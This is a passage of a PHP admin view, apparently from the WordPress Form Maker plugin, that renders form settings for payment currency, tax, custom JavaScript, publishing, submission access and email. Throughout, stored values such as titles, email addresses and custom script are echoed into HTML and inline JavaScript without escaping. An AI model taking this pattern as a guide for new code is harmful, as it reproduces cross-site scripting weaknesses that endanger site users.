                <option value="SEK" <?php echo (($row->payment_currency == 'SEK') ? 'selected' : ''); ?>>kr &#8226; Swedish Kronor</option>
                <option value="PLN" <?php echo (($row->payment_currency == 'PLN') ? 'selected' : ''); ?>>zl &#8226; Polish Zloty</option>
                <option value="AUD" <?php echo (($row->payment_currency == 'AUD') ? 'selected' : ''); ?>>A$ &#8226; Australian Dollar</option>
                <option value="DKK" <?php echo (($row->payment_currency == 'DKK') ? 'selected' : ''); ?>>kr &#8226; Danish Kroner</option>
                <option value="CHF" <?php echo (($row->payment_currency == 'CHF') ? 'selected' : ''); ?>>CHF &#8226; Swiss Francs</option>
                <option value="CZK" <?php echo (($row->payment_currency == 'CZK') ? 'selected' : ''); ?>>Kc &#8226; Czech Koruny</option>
                <option value="ILS" <?php echo (($row->payment_currency == 'ILS') ? 'selected' : ''); ?>>&#8362; &#8226; Israeli Sheqel</option>
                <option value="BRL" <?php echo (($row->payment_currency == 'BRL') ? 'selected' : ''); ?>>R$ &#8226; Brazilian Real</option>
                <option value="TWD" <?php echo (($row->payment_currency == 'TWD') ? 'selected' : ''); ?>>NT$ &#8226; Taiwan New Dollars</option>
                <option value="MYR" <?php echo (($row->payment_currency == 'MYR') ? 'selected' : ''); ?>>RM &#8226; Malaysian Ringgit</option>
                <option value="PHP" <?php echo (($row->payment_currency == 'PHP') ? 'selected' : ''); ?>>&#8369; &#8226; Philippine Peso</option>
                <option value="THB" <?php echo (($row->payment_currency == 'THB') ? 'selected' : ''); ?>>&#xe3f; &#8226; Thai Bahtv</option>
              </select>
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="tax">Tax</label>
            </td>
            <td class="fm_options_value">
              <input type="text" name="tax" id="tax" value="<?php echo $row->tax; ?>" class="text_area" style="width: 40px;" onKeyPress="return check_isnum_point(event)"> %
            </td>
          </tr>
        </table>
      </fieldset>
      <fieldset id="javascript_fieldset" class="adminform fm_fieldset_deactive">
        <legend style="color:#0B55C4;font-weight: bold;">JavaScript</legend>
        <table class="admintable">
          <tr valign="top">
            <td class="fm_options_label">
              <label for="javascript">Javascript</label>
            </td>
            <td class="fm_options_value">
              <textarea style="margin: 0px;" cols="60" rows="30" name="javascript" id="javascript"><?php echo $row->javascript; ?></textarea>
            </td>
          </tr>
        </table>
      </fieldset>
      <input type="hidden" name="fieldset_id" id="fieldset_id" value="<?php echo WDW_FMC_Library::get('fieldset_id', 'general'); ?>" />
      <input type="hidden" id="task" name="task" value=""/>
      <input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
    </form>
    <script>
      jQuery(window).load(function () {
        form_maker_options_tabs(jQuery("#fieldset_id").val());
        fm_popup();
      });
    </script>
    <?php
  }
    
	public function form_options($id) {
		
	
		$row = $this->model->get_row_data($id);
		$themes = $this->model->get_theme_rows_data();
		$queries = $this->model->get_queries_rows_data($id);
		$userGroups = get_editable_roles();
		$page_title = $row->title . ' form options';
		$label_id = array();
		$label_label = array();
		$label_type = array();
		$label_all = explode('#****#', $row->label_order_current);
		$label_all = array_slice($label_all, 0, count($label_all) - 1);
		foreach ($label_all as $key => $label_each) {
			$label_id_each = explode('#**id**#', $label_each);
			array_push($label_id, $label_id_each[0]);
			$label_order_each = explode('#**label**#', $label_id_each[1]);
			array_push($label_label, $label_order_each[0]);
			array_push($label_type, $label_order_each[1]);
		}
		$fields = explode('*:*id*:*type_submitter_mail*:*type*:*', $row->form_fields);
		$fields_count = count($fields);
		?>
		<script>
			function fm_change_radio_checkbox_text(elem) {
				var labels_array = [];
					labels_array['paypal_mode'] = ['Off', 'On'];
					labels_array['checkout_mode'] = ['Testmode', 'Production'];
					labels_array['mail_mode'] = ['Text', 'HTML'];
					labels_array['mail_mode_user'] = ['Text', 'HTML'];
					labels_array['value'] = ['1', '0'];
				
				jQuery(elem).val(labels_array['value'][jQuery(elem).val()]);
				jQuery(elem).next().val(jQuery(elem).val());
				
				var clicked_element = labels_array[jQuery(elem).attr('name')];
				jQuery(elem).find('label').html(clicked_element[jQuery(elem).val()]);
				if(jQuery( elem ).hasClass( "fm-text-yes" )) {
					jQuery( elem ).removeClass('fm-text-yes').addClass('fm-text-no');
					jQuery(elem).find("span").animate({
						right: parseInt(jQuery( elem ).css( "width")) - 14 + 'px'
					}, 400, function() {
					}); 
				}	
				else {
					jQuery( elem ).removeClass('fm-text-no').addClass('fm-text-yes');
					jQuery(elem).find("span").animate({
						right: 0
					}, 400, function() {
					}); 
				}		
			}
			
			gen = "<?php echo $row->counter; ?>";
			form_view_max = 20;
			function set_preview() {
				jQuery("#preview_form").attr("onclick", "tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'form_id' => $row->id), admin_url('admin-ajax.php')); ?>&test_theme=" + jQuery('#theme').val() + "&width=1000&height=500&TB_iframe=1'); return false;");
				jQuery("#edit_css").attr("onclick", "tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerEditCSS_fmc', 'form_id' => $row->id), admin_url('admin-ajax.php')); ?>&id=" + jQuery('#theme').val() + "&width=800&height=500&TB_iframe=1'); return false;");
			}
			
			function set_condition() {
				field_condition = '';
				for(i=0;i<500;i++) {
					conditions = '';
					if(document.getElementById("condition"+i)) {
						field_condition+=document.getElementById("show_hide"+i).value+"*:*show_hide*:*";
						field_condition+=document.getElementById("fields"+i).value+"*:*field_label*:*";
						field_condition+=document.getElementById("all_any"+i).value+"*:*all_any*:*";
						for(k=0;k<500;k++) {
							if(document.getElementById("condition_div"+i+"_"+k)) {
								conditions+=document.getElementById("field_labels"+i+"_"+k).value+"***";
								conditions+=document.getElementById("is_select"+i+"_"+k).value+"***";
								if(document.getElementById("field_value"+i+"_"+k).tagName=="SELECT" ) {
									if(document.getElementById("field_value"+i+"_"+k).getAttribute('multiple')) {
										var sel = document.getElementById("field_value"+i+"_"+k);
										var selValues = '';
										for(m=0; m < sel.length; m++) {
											if(sel.options[m].selected)
											
											selValues += sel.options[m].value+"@@@";
										}
										conditions+=selValues;
									} else {
										conditions+=document.getElementById("field_value"+i+"_"+k).value;
									}								
								}
								else
									conditions+=document.getElementById("field_value"+i+"_"+k).value;
								conditions+="*:*next_condition*:*";
							}
						}
						field_condition+=conditions;
						field_condition+="*:*new_condition*:*";
					}
				}
				document.getElementById('condition').value = field_condition;
			}      
    
			function show_verify_options(s){
				if(s){
					jQuery(".verification_div").removeAttr( "style" );
					jQuery(".expire_link").removeAttr( "style" );
						
				} else{
					jQuery(".verification_div").css( 'display', 'none' );
					jQuery(".expire_link").css( 'display', 'none' );
				}
			}
		</script>
		<style>
		.CodeMirror {
			border: 1px solid #ccc;
			font-size: 12px;
			margin-bottom: 6px;
			background: white;
		}
		</style>
		<div class="fm-user-manual">
			This section allows you to edit form options.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-3.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form class="wrap" method="post" action="admin.php?page=manage_fmc" style="width:99%;" name="adminForm" id="adminForm">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<div class="fm-page-header">
				<div class="fm-page-title" style="width: inherit;">
					<?php echo $page_title; ?>
				</div>
				<div class="fm-page-actions">
					<button class="fm-button save-button small" onclick="if (fm_check_email('mailToAdd') ||fm_check_email('from_mail') || fm_check_email('reply_to') || fm_check_email('mail_from_user') || fm_check_email('reply_to_user') || fm_check_email('mail_from_other') || fm_check_email('reply_to_other') || fm_check_email('paypal_email')) {return false;}; set_condition(); wd_fm_apply_options('save_options');">
						<span></span>
						Save
					</button>
					<button class="fm-button apply-button small" onclick="if (fm_check_email('mailToAdd') ||  fm_check_email('from_mail') || fm_check_email('reply_to') || fm_check_email('mail_from_user') || fm_check_email('reply_to_user') || fm_check_email('mail_from_other') || fm_check_email('reply_to_other') || fm_check_email('paypal_email')) {return false;}; set_condition(); wd_fm_apply_options('apply_options');">
						<span></span>
						Apply
					</button>
					<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', 'cancel_options');">
						<span></span>
						Cancel
					</button>
				</div>
				<div class="fm-clear"></div>
			</div>	
			<div class="fm-form-options">
				<div class="submenu-box">
					<div class="submenu-pad">
						<ul id="submenu" class="configuration">
							<li>
								<a id="general" class="fm_fieldset_tab" onclick="form_maker_options_tabs('general')" href="#">General Options</a>
							</li>
							<li>
								<a id="custom" class="fm_fieldset_tab" onclick="form_maker_options_tabs('custom')" href="#">Email Options</a>
							</li>
							<li>
								<a id="actions" class="fm_fieldset_tab" onclick="form_maker_options_tabs('actions')" href="#">Actions after Submission</a>
							</li>
							<li>
								<a id="payment" class="fm_fieldset_tab" onclick="form_maker_options_tabs('payment')" href="#">Payment Options</a>
							</li>
							<li>
								<a id="javascript" class="fm_fieldset_tab" onclick="form_maker_options_tabs('javascript'); codemirror_for_javascript();" href="#">JavaScript</a>
							</li>
							<li>
								<a id="conditions" class="fm_fieldset_tab" onclick="form_maker_options_tabs('conditions')" href="#">Conditional Fields</a>
							</li>
							
						</ul>
					</div>
				</div>
				<fieldset id="general_fieldset" class="adminform fm_fieldset_deactive">
					<legend>General Options</legend>
						<table class="admintable" >
							<tr valign="top">
								<td class="fm_options_label">
									<label>Published</label>
								</td>
								<td class="fm_options_value">
									<button class="fm-checkbox-radio-button <?php echo $row->published == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->published; ?>">
										<span></span>
									</button>
									<input type="hidden" name="published" value="<?php echo $row->published; ?>"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label>Save data(to database)</label>
								</td>
								<td class="fm_options_value">
									<button class="fm-checkbox-radio-button <?php echo $row->savedb == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->savedb; ?>">
										<span></span>
									</button>
									<input type="hidden" name="savedb" value="<?php echo $row->savedb; ?>"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="theme">Theme</label>
								</td>
								<td class="fm_options_value">
									<select id="theme" name="theme" onChange="set_preview()">
										<?php
										foreach ($themes as $theme) {
											?>
											<option value="<?php echo $theme->id; ?>" <?php echo (($theme->id == $row->theme) ? 'selected' : ''); ?>><?php echo $theme->title; ?></option>
											<?php
										}
										?>
									</select>
									<button id="preview_form" class="fm-button preview-button small" onclick="tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'form_id' => $row->id, 'test_theme' => $row->theme, 'width' => '1000', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>'); return false;">
										<span></span>
										Preview
									</button>
									<button id="edit_css" class="fm-button options-edit-button small" onclick="tb_show('', '<?php echo add_query_arg(array('action' => 'FormMakerEditCSS_fmc', 'id' => $row->theme, 'form_id' => $row->id, 'width' => '1000', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>'); return false;">
										<span></span>
										Edit CSS
									</button>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="requiredmark">Required fields mark</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="requiredmark" name="requiredmark" value="<?php echo $row->requiredmark; ?>" style="width:250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label>Save Uploads</label>
								</td>
								<td class="fm_options_value">
									<button class="fm-checkbox-radio-button <?php echo $row->save_uploads == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->save_uploads; ?>">
										<span></span>
									</button>
									<input type="hidden" name="save_uploads" value="<?php echo $row->save_uploads; ?>"/>
								</td>
							</tr>
						</table>
						<br/>
						<div class="error_fm" style="padding: 5px; font-size: 14px;">Front end submissions are disabled in free version.</div>
						<fieldset class="adminform">
							<legend>Front end submissions access level</legend>
							<table>
								<tr>
									<td class="key">
										<label for="name">Allow User to see submissions:</label>
									</td>
									<td>
										<?php
										$checked_UserGroup=explode(',',$row->user_id_wd);
										$i = 0;
										foreach($userGroups as $val => $uG) {
											echo '<input type="checkbox" value="'.$val .'"  id="user_'.$i.'"';                  
											if(in_array($val ,$checked_UserGroup))
												echo 'checked="checked"';                  
											echo 'onchange="acces_level('.count($userGroups).')" disabled/><label for="user_'.$i.'">'.$uG["name"].'</label><br>';
											$i++;
										}
										?>
										<input type="checkbox" value="guest"  id="user_<?php echo $i; ?>" onchange="acces_level(<?php echo count($userGroups); ?>)"<?php echo (in_array('guest', $checked_UserGroup) ? 'checked="checked"' : '') ?> disabled/><label for="user_<?php echo $i; ?>">Guest</label>
										<input type="hidden" name="user_id_wd" value="<?php echo $row->user_id_wd ?>" id="user_id_wd" />
									</td>
								</tr>              
							</table>
						</fieldset>
						<?php
						$labels_for_submissions = $this->model->get_labels($id);
						$payment_info = $this->model->is_paypal($id);
						$labels_id_for_submissions= array();
						$label_titles_for_submissions=array();
						$labels_type_for_submissions= array();
						if($labels_for_submissions) {
							$label_id_for_submissions= array();
							$label_order_original_for_submissions= array();
							$label_type_for_submissions= array();
							
							if(strpos($row->label_order, 'type_paypal_')) {
								$row->label_order=$row->label_order."item_total#**id**#Item Total#**label**#type_paypal_payment_total#****#total#**id**#Total#**label**#type_paypal_payment_total#****#0#**id**#Payment Status#**label**#type_paypal_payment_status#****#";
							}
							
							$label_all_for_submissions	= explode('#****#',$row->label_order);
							$label_all_for_submissions 	= array_slice($label_all_for_submissions,0, count($label_all_for_submissions)-1);   
							foreach($label_all_for_submissions as $key => $label_each) {
								$label_id_each=explode('#**id**#',$label_each);
								array_push($label_id_for_submissions, $label_id_each[0]);
								$label_order_each=explode('#**label**#', $label_id_each[1]);
								array_push($label_order_original_for_submissions, $label_order_each[0]);
								array_push($label_type_for_submissions, $label_order_each[1]);
							}
							
							foreach($label_id_for_submissions as $key => $label) {
								if(in_array($label, $labels_for_submissions)) {
									array_push($labels_type_for_submissions, $label_type_for_submissions[$key]);
									array_push($labels_id_for_submissions, $label);
									array_push($label_titles_for_submissions, $label_order_original_for_submissions[$key]);
								}
							}
						}
						
						$stats_labels = array();
						$stats_labels_ids = array();
						foreach($labels_type_for_submissions as $key => $label_type_cur) {
							if($label_type_cur=="type_checkbox" || $label_type_cur=="type_radio" || $label_type_cur=="type_own_select" || $label_type_cur=="type_country" || $label_type_cur=="type_paypal_select" || $label_type_cur=="type_paypal_radio" || $label_type_cur=="type_paypal_checkbox" || $label_type_cur=="type_paypal_shipping") {
								$stats_labels_ids[] = $labels_id_for_submissions[$key];
								$stats_labels[] = $label_titles_for_submissions[$key];
							}
						}
						?>
						<script type="text/javascript">
							function inArray(needle, myarray) {
								var length = myarray.length;
								for(var i = 0; i < length; i++) {
									if(myarray[i] == needle) return true;
								}
								return false;
							}

							function checked_labels(class_name) {
								var checked_ids ='';            
								jQuery('.'+class_name).each(function() {
								  if(this.checked) {
									checked_ids += this.value+',';		
								  }
								}); 
								
								if(class_name == 'filed_label') {
									document.getElementById("frontend_submit_fields").value = checked_ids ;
									if(checked_ids == document.getElementById("all_fields").value)
										document.getElementById("all_fields").checked = true;
									else
										document.getElementById("all_fields").checked = false;
								}
								else {
								  document.getElementById("frontend_submit_stat_fields").value = checked_ids ;
								  if(checked_ids == document.getElementById("all_stats_fields").value)
									document.getElementById("all_stats_fields").checked = true;
								  else
									document.getElementById("all_stats_fields").checked = false;
								}
							}
          
							jQuery(document).ready(function () {
								jQuery('.filed_label').each(function() {
									if(document.getElementById("frontend_submit_fields").value == document.getElementById("all_fields").value)
										document.getElementById("all_fields").checked = true;
									if(inArray(this.value, document.getElementById("frontend_submit_fields").value.split(","))) {
										this.checked = true;
									}
								});

								jQuery('.stats_filed_label').each(function() {
									if(document.getElementById("frontend_submit_stat_fields").value == document.getElementById("all_stats_fields").value)
										document.getElementById("all_stats_fields").checked = true;          
									if(inArray(this.value, document.getElementById("frontend_submit_stat_fields").value.split(","))) {
										this.checked = true;		
									}              
								});
              
								jQuery(document).on('change','input[name="all_fields"]',function() {
									jQuery('.filed_label').prop("checked" , this.checked);
								});

								jQuery(document).on('change','input[name="all_stats_fields"]',function() {
									jQuery('.stats_filed_label').prop("checked" , this.checked);
								});
							});
						</script>
						<style>
						li{
							list-style-type: none;
						}

						.simple_table {
							padding-left: 0px !important;
						}

						.simple_table input, .simple_table label, .simple_table img {
							display:inline-block !important;
							float:none !important;
						}
						</style>
						<fieldset class="adminform">
							<legend>Fields to hide in frontend submissions</legend>
							<?php if(count($label_titles_for_submissions)): ?>
							<table style="margin-left:-3px;">
							  <tr>
								<td> 
								  <label>Select fields:</label>
								</td>
								<td  class="simple_table">
								  <ul id="form_fields">
									<li>
									<input type="checkbox" name="all_fields" id="all_fields" value="submit_id,<?php echo implode(',',$labels_id_for_submissions)."," . ($payment_info ? "payment_info" : ""); ?>" onclick="checked_labels('filed_label')" disabled/>
									<label for="all_fields">Select All</label>
									</li>
									<?php 
									echo "<li><input type=\"checkbox\" id=\"submit_id\" name=\"submit_id\" value=\"submit_id\" class=\"filed_label\"  onclick=\"checked_labels('filed_label')\" disabled><label for=\"submit_id\">ID</label></li>";	
									  
									for($i=0, $n=count($label_titles_for_submissions); $i < $n ; $i++)     
									{
									  $field_label = $label_titles_for_submissions[$i];

									  echo "<li><input type=\"checkbox\" id=\"filed_label".$i."\" name=\"filed_label".$i."\" value=\"".$labels_id_for_submissions[$i]."\" class=\"filed_label\" onclick=\"checked_labels('filed_label')\" disabled><label for=\"filed_label".$i."\">".(strlen($field_label) > 80 ? substr ($field_label ,0, 80).'...' : $field_label)."</label></li>";
										   
									}
									if($payment_info)
									echo "<li><input type=\"checkbox\" id=\"payment_info\" name=\"payment_info\" value=\"payment_info\" class=\"filed_label\" onclick=\"checked_labels('filed_label')\" disabled><label for=\"payment_info\">Payment Info</label></li>";
									?>
								  </ul>
								  <input type="hidden" name="frontend_submit_fields" value="<?php echo $row->frontend_submit_fields ?>" id="frontend_submit_fields" />
								</td>	
							  </tr>
							  <?php if($stats_labels): ?>
							  <tr id="stats">
								<td> 
								  <label>Stats fields:</label>
								</td>
								<td class="simple_table">
								  <ul id="stats_fields">
									<li>
									<input type="checkbox" name="all_stats_fields" id="all_stats_fields" value="<?php echo implode(',',$stats_labels_ids).","; ?>" onclick="checked_labels('stats_filed_label')" disabled>
									<label for="all_stats_fields">Select All</label>
									</li>
									<?php 
									for($i=0, $n=count($stats_labels); $i < $n ; $i++)     
									{
									  $field_label = $stats_labels[$i];
									  echo "<li><input type=\"checkbox\" id=\"stats_filed_label".$i."\" name=\"stats_filed_label".$i."\" value=\"".$stats_labels_ids[$i]."\" class=\"stats_filed_label\" onclick=\"checked_labels('stats_filed_label')\" disabled><label for=\"stats_filed_label".$i."\" >".(strlen($field_label) > 80 ? substr ($field_label ,0, 80).'...' : $field_label)."</label></li>";
									}
									?>
								  </ul>
								  <input type="hidden" name="frontend_submit_stat_fields" value="<?php echo $row->frontend_submit_stat_fields ?>" id="frontend_submit_stat_fields" />
								</td>	
							  </tr>
							  <?php endif; ?>
							</table>
						  <?php endif; ?>
						</fieldset>
				</fieldset>
				<fieldset id="custom_fieldset" class="adminform fm_fieldset_deactive">
					<legend>Email Options</legend>
					<table class="admintable">
						<tr valign="top">
							<td style="width: 75px; vertical-align: middle;">
								<label>Send E-mail</label>
							</td>
							<td style="padding: 15px;">
								<button class="fm-checkbox-radio-button <?php echo $row->sendemail == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->sendemail; ?>">
									<span></span>
								</button>
								<input type="hidden" name="sendemail" value="<?php echo $row->sendemail; ?>"/>
							</td>
						</tr>
					</table>
					<fieldset class="adminform fm_mail_options">
						<legend>Email to Administrator</legend>
						<table class="admintable">
							<tr valign="top">
								<td class="fm_options_label">
									<label for="mailToAdd">Email to send submissions to</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mailToAdd" name="mailToAdd" style="width: 250px;" />
									<input type="hidden" id="mail" name="mail" value="<?php echo $row->mail . ($row->mail && (substr($row->mail, -1) != ',') ? ',' : ''); ?>" />
									<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version"); ?>" style="vertical-align: middle; cursor: pointer;" title="Add more emails" onclick="if (fm_check_email('mailToAdd')) {return false;};cfm_create_input('mail', 'mailToAdd', 'cfm_mail_div', '<?php echo WD_FMC_URL; ?>')" />
									<div id="cfm_mail_div">
										<?php
										$mail_array = explode(',', $row->mail);
										foreach ($mail_array as $mail) {
											if ($mail && $mail != ',') {
												?>
												<div class="fm_mail_input">
													<?php echo $mail; ?>
													<img src="<?php echo WD_FMC_URL; ?>/images/delete.png?ver=<?php echo get_option("wd_form_maker_version"); ?>" class="fm_delete_img" onclick="fm_delete_mail(this, '<?php echo $mail; ?>')" title="Delete Email" />
												</div>
												<?php
											}
										}
										?>
									</div>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="from_mail">Email From</label>
								</td>
								<td class="fm_options_value">
									<?php 
									$is_other = TRUE;
									for ($i = 0; $i < $fields_count - 1; $i++) {
										?>
										<div>
											 <input type="radio" name="from_mail" id="from_mail<?php echo $i; ?>" value="<?php echo (strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]); ?>"  <?php echo ((strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]) == $row->from_mail ? 'checked="checked"' : '' ); ?> onclick="wdhide('mail_from_other')" />
											<label for="from_mail<?php echo $i; ?>"><?php echo substr($fields[$i + 1], 0, strpos($fields[$i + 1], '*:*w_field_label*:*')); ?></label>
										</div>
										<?php
										if(strlen($fields[$i])!=1) {
											if (substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*') + 15, strlen($fields[$i])) == $row->from_mail) {
												$is_other = FALSE;
											}
										}
										else {
											if($fields[$i] == $row->from_mail)
												$is_other=false;
										}
									}
									?>
									<div style="<?php echo ($fields_count == 1) ? 'display:none;' : ''; ?>">
										<input type="radio" id="other" name="from_mail" value="other" <?php echo ($is_other) ? 'checked="checked"' : ''; ?> onclick="wdshow('mail_from_other')" />
										<label for="other">Other</label>
									</div>
									<input type="text" style="width: <?php echo ($fields_count == 1) ? '250px' : '235px; margin-left: 15px' ?>; display: <?php echo ($is_other) ? 'block;' : 'none;'; ?>" id="mail_from_other" name="mail_from_other" value="<?php echo ($is_other) ? $row->from_mail : ''; ?>" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="from_name">From Name</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="from_name" name="from_name" value="<?php echo $row->from_name; ?>" style="width: 250px;" />
									<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version").''; ?>" onclick="document.getElementById('mail_from_labels').style.display='block';" style="vertical-align: middle; cursor: pointer;display:inline-block; margin:0px; float:none;">
									<?php 
									$choise = "document.getElementById('from_name')";
									echo '<div style="position:relative; top:-3px;"><div id="mail_from_labels" class="email_labels" style="display:none;">';
									echo "<a onClick=\"insertAtCursor(".$choise.",'username'); document.getElementById('mail_from_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Username</a>";
									for($i=0; $i<count($label_label); $i++) {
										if($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button" || $label_type[$i]=="type_file_upload" || $label_type[$i]=="type_send_copy" || $label_type[$i]=="type_matrix")			
										continue;		
										
										$param = htmlspecialchars(addslashes($label_label[$i]));			
										$fld_label = $param;
										if(strlen($fld_label)>30) {
											$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
											$fld_label = explode("\n", $fld_label);
											$fld_label = $fld_label[0] . ' ...';	
										}
									
										echo "<a onClick=\"insertAtCursor(".$choise.",'".$param."'); document.getElementById('mail_from_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">".$fld_label."</a>";
									}
									echo "<a onClick=\"insertAtCursor(".$choise.",'subid'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Submission ID</a>";	

									echo "<a onClick=\"insertAtCursor(".$choise.",'username'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Username</a>";
									echo '</div></div>';								
									?>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="reply_to">Reply to<br/>(if different from "Email From") </label>
								</td>
								<td class="fm_options_value">
									<?php 
									$is_other = TRUE;
									for ($i = 0; $i < $fields_count - 1; $i++) {
										?>
										<div>
											<input type="radio" name="reply_to" id="reply_to<?php echo $i; ?>" value="<?php echo (strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]); ?>"  <?php echo ((strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]) == $row->reply_to ? 'checked="checked"' : '' ); ?> onclick="wdhide('reply_to_other')" />
											<label for="reply_to<?php echo $i; ?>"><?php echo substr($fields[$i + 1], 0, strpos($fields[$i + 1], '*:*w_field_label*:*')); ?></label>
										</div>
										<?php
										if(strlen($fields[$i])!=1) {
											if (substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*') + 15, strlen($fields[$i])) == $row->reply_to) {
												$is_other = FALSE;
											}
										}
										else {
											if($fields[$i] == $row->reply_to)
												$is_other=false;
										}
									}
									?>
									<div style="<?php echo ($fields_count == 1) ? 'display: none;' : ''; ?>">
										<input type="radio" id="other1" name="reply_to" value="other" <?php echo ($is_other) ? 'checked="checked"' : ''; ?> onclick="wdshow('reply_to_other')" />
										<label for="other1">Other</label>
									</div>
									<input type="text" style="width: <?php echo ($fields_count == 1) ? '250px' : '235px; margin-left: 15px'; ?>; display: <?php echo ($is_other) ? 'block;' : 'none;'; ?>" id="reply_to_other" name="reply_to_other" value="<?php echo ($is_other && $row->reply_to) ? $row->reply_to : ''; ?>" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> CC: </label>
								</td>
								<td class="fm_options_value">
									<input  type="text" id="mail_cc" name="mail_cc" value="<?php echo $row->mail_cc ?>" style="width:250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> BCC: </label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_bcc" name="mail_bcc" value="<?php echo $row->mail_bcc ?>" style="width:250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> Subject: </label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_subject" name="mail_subject" value="<?php echo $row->mail_subject ?>" style="width:250px;" />
									<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version").''; ?>" onclick="document.getElementById('mail_subject_labels').style.display='block';" style="vertical-align: middle;cursor: pointer; display:inline-block; margin:0px; float:none;">
									<?php 
									$choise = "document.getElementById('mail_subject')";
									echo '<div style="position:relative; top:-3px;"><div id="mail_subject_labels" class="email_labels" style="display:none;">';							
									for($i=0; $i<count($label_label); $i++)	{ 			
										if($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button" || $label_type[$i]=="type_file_upload" || $label_type[$i]=="type_send_copy" || $label_type[$i]=="type_matrix")			
										continue;		
										
										$param = htmlspecialchars(addslashes($label_label[$i]));			
										
										$fld_label = $param;
										if(strlen($fld_label)>30)
										{
											$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
											$fld_label = explode("\n", $fld_label);
											$fld_label = $fld_label[0] . ' ...';	
										}
									
										echo "<a onClick=\"insertAtCursor(".$choise.",'".$param."'); document.getElementById('mail_subject_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">".$fld_label."</a>";	

									}
									echo "<a onClick=\"insertAtCursor(".$choise.",'subid'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Submission ID</a>";	

									echo "<a onClick=\"insertAtCursor(".$choise.",'username'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Username</a>";
									echo '</div></div>';								
									?>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Mode: </label>
								</td>
								<td class="fm_options_value">
									<button name="mail_mode"class="fm-checkbox-radio-button <?php echo $row->mail_mode == 1 ? 'fm-text-yes' : 'fm-text-no' ?> medium" onclick="fm_change_radio_checkbox_text(this); return false;" value="<?php echo $row->mail_mode  ?>">
										<label><?php echo $row->mail_mode == 1 ? 'HTML' : 'Text' ?></label>
										<span></span>
									</button>
									<input type="hidden" name="mail_mode" value="<?php echo $row->mail_mode; ?>"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Attach File: </label>
								</td>
								<td class="fm_options_value">
									<div class="error_fm" style="padding: 5px; font-size: 14px;">File attach is disabled in free version.</div>
									<input type="hidden" name="mail_attachment" value="<?php echo $row->mail_attachment; ?>"/>
								</td>
